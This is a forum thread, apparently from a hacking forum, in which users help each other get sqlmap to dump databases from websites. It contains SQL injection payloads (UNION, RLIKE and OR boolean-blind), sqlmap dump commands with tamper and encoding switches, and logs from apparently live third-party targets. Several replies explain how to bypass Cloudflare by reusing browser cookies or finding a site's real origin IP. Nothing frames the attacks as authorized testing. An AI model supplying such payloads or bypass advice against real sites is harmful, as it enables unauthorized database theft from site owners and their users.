Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. ApTemkA

    ApTemkA New Member

    I found this vulnerability
    [IMG]
    There turned out to be one database, not counting information_schema. I got the tables and dumped the first table, everything was OK; I try the others and it is the same thing everywhere:
    Code:
    [15:13:21] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
    [15:13:22] [WARNING] unable to retrieve the entries of columns 'name' for table 'Test' in database 'm12540_pc'
     
  2. ShpillyWilly

    ShpillyWilly New Member

    How can it be that the most primitive query works by hand
    HTML:
    site.com/view.php?cid=1+union+select+1,2,3,4,5,6
    , but sqlmap flatly does not see it, even if I feed it the database type, the number of columns for UNION, and level/risk? Tell me if you have any ideas..
     
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    --headers="X-Requested-With: XMLHttpRequest", no?
     
  4. ShpillyWilly

    ShpillyWilly New Member

    Thanks for the suggestion, but, whatever it means, it unfortunately gave no result.
     
  5. erwerr2321

    erwerr2321 Elder - Старейшина

    Everything worked successfully with these parameters

    --random-agent --dbms=mysql --technique=u
     
    ShpillyWilly likes this.
  6. Sensoft

    Sensoft Member

    What is the problem? It does not output the DB
    Code:
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: address (GET)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: address=if' RLIKE (SELECT (CASE WHEN (1726=1726) THEN 0x6966 ELSE 0x28 END)) AND 'yDAP'='yDAP
    ---
    [10:58:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [10:58:47] [INFO] testing MySQL
    [10:58:47] [INFO] confirming MySQL
    [10:58:47] [INFO] the back-end DBMS is MySQL
    web application technology: Apache, PHP 7.1.11
    back-end DBMS: MySQL >= 5.0.0
    [10:58:47] [INFO] fetching database names
    [10:58:47] [INFO] fetching number of databases
    [10:58:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [10:58:47] [INFO] retrieved:
    [10:58:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases
    
    [10:58:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [10:58:48] [ERROR] unable to retrieve the number of databases
    [10:58:48] [INFO] falling back to current database
    [10:58:48] [INFO] fetching current database
    [10:58:48] [INFO] retrieved:
    [10:58:49] [CRITICAL] unable to retrieve the database names
    [10:58:49] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 6 times
     
  7. erwerr2321

    erwerr2321 Elder - Старейшина

    Actually,

    [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

    kind of hints...
    In your case, --no-cast
     
  8. akv84

    akv84 New Member

    Good afternoon,

    I cannot get a dump of the table I need in SQLite:
    command: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump
    The output is:
    [INFO] retrieved: CREATE TABLE USERDB ( OID
    [WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'

    I get some tables in this same database without problems.
     
  9. BabaDook

    BabaDook Well-Known Member

    Maybe it makes sense to dump not the whole table but specific columns, for example
     
    akv84 likes this.
  10. t0ma5

    t0ma5 Reservists Of Antichat

    SQLite has no databases, only tables; -D SQLite_db is definitely not needed
     
    _________________________
    BabaDook, erwerr2321 and akv84 like this.
  11. akv84

    akv84 New Member

    It does not output the columns, everything is the same: "unable to enumerate the columns"

    Thanks!
     
  12. BabaDook

    BabaDook Well-Known Member

    Right, right. I did not think sql works on sqlite
     
  13. Xsite

    Xsite Member

    Can you tell me, is there a solution to the trouble with the cloud? As I understand it, it does not run because of it

    [12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
    [12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
     
  14. dmax0fw

    dmax0fw Level 8

    Try passing the verification manually in a browser, cloudflare will assign you cookies, then pass those cookies to sqlmap
     
  15. ekaterina333

    ekaterina333 Banned

    I do not think that will help, the problem there is something else
     
  16. ShpillyWilly

    ShpillyWilly New Member

    Try to find out the real IP and query that instead. https://forum.antichat.ru/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
     
  17. Xsite

    Xsite Member

  18. Golfstream

    Golfstream New Member

    [22:12:44] [WARNING] the web server responded with an HTTP error code (424) which could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: vote (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3
    ---
    [22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server
    back-end DBMS: Microsoft SQL Server 2016
    [22:12:44] [INFO] fetching database names
    [22:12:44] [INFO] fetching number of databases
    [22:12:46] [INFO] retrieved:
    [22:12:46] [ERROR] unable to retrieve the number of databases
    [22:12:46] [INFO] retrieving the length of query output
    [22:12:46] [INFO] retrieved:
    [22:12:47] [INFO] retrieved:
    [22:12:47] [INFO] falling back to current database
    [22:12:47] [INFO] fetching current database
    [22:12:47] [INFO] retrieving the length of query output
    [22:12:47] [INFO] retrieved:
    [22:12:48] [INFO] retrieved:
    [22:12:48] [CRITICAL] unable to retrieve the database names
    [22:12:48] [WARNING] HTTP error codes detected during run:
    424 (?) - 24 times

    Please advise on the next steps, maybe some command is missing? The DB is being blocked. I used tampers, but to no avail
     
    #598 Golfstream, 27 Jan 2018
    Last edited: 27 Jan 2018
  19. panic.ker

    panic.ker Member

    Turn on -v 3 and --parse-errors, and look there to see where the problem comes from. Also try --no-cast or --hex, sometimes it works. Try char-encoding it.
     
  20. Sensoft

    Sensoft Member

    I found a blind SQL injection on a site, but it is in the account profile
    How do I attach a session or something like that?